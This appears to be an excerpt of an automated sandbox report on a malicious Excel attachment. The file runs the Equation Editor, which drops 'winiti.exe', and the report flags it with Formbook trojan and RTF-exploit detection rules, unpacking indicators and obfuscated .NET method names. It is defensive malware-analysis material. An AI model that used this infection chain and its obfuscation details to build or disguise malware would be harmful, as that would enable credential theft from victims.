                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0097123810_2_00971238
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008CF3CF10_2_008CF3CF
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008D735310_2_008D7353
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008E148910_2_008E1489
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0090548510_2_00905485
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0090D47D10_2_0090D47D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_009735DA10_2_009735DA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008D351F10_2_008D351F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0095579A10_2_0095579A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_009057C310_2_009057C3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0096771D10_2_0096771D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0094F8C410_2_0094F8C4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0096F8EE10_2_0096F8EE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0095595510_2_00955955
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0095394B10_2_0095394B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00983A8310_2_00983A83
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0095DBDA10_2_0095DBDA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008CFBD710_2_008CFBD7
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008F7B0010_2_008F7B00
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0096FDDD10_2_0096FDDD
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0095BF1410_2_0095BF14
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008FDF7C10_2_008FDF7C
                Source: RFQ#51281AOLAI.xlsOLE indicator, VBA macros: true
                Source: ~DFB487D2232F45372D.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 008CE2A8 appears 60 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 0093F970 appears 84 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00913F92 appears 132 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 0091373B appears 253 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 008CDF5C appears 137 times
                Source: 10.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 10.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1804222C.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: winiti[1].exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: winiti.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 9.2.winiti.exe.680000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 9.2.winiti.exe.680000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 9.2.winiti.exe.26e505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 9.2.winiti.exe.26e505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/25@8/3
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\1E630000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA3AD.tmpJump to behavior
                Source: RFQ#51281AOLAI.xlsOLE indicator, Workbook stream: true
                Source: 1E630000.0.drOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: RFQ#51281AOLAI.xlsStatic file information: File size 1155072 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: amWV.pdb source: winiti.exe, 00000009.00000000.440872955.00000000011D2000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.8.dr, winiti[1].exe.8.dr
                Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000009.00000000.440872955.00000000011D2000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.8.dr, winiti[1].exe.8.dr
                Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp
                Source: 1E630000.0.drInitial sample: OLE indicators vbamacros = False
                Source: 1E630000.0.drInitial sample: OLE indicators encrypted = True

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 9.2.winiti.exe.680000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 9.2.winiti.exe.26e505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: winiti[1].exe.8.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: winiti.exe.8.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00401420 push es; retn 00F1h10_2_004014F8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0041F0DC push es; retf 10_2_0041F0E6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00412104 pushad ; ret 10_2_0041212D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040C1EA push edx; retf 10_2_0040C1EE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00403260 push eax; ret 10_2_00403262
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00426263 push edi; iretd 10_2_0042626E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00408271 push es; ret 10_2_00408272
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00413A0B push esi; retf 10_2_00413A0E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00418A13 push ds; retf 2ECDh10_2_00418BEE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00418355 push ebp; retf 10_2_004183DC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00418BA5 push ebx; iretd 10_2_00418BA6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0041E653 push ds; iretd 10_2_0041E654
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0041E63B push ebx; iretd 10_2_0041E64C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_004187CA push ebp; ret 10_2_004187CB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008CDFA1 push ecx; ret 10_2_008CDFB4
                Source: winiti[1].exe.8.drStatic PE information: section name: .text entropy: 7.760978166314589
                Source: winiti.exe.8.drStatic PE information: section name: .text entropy: 7.760978166314589
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                Source: 9.2.winiti.exe.1120000.2.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
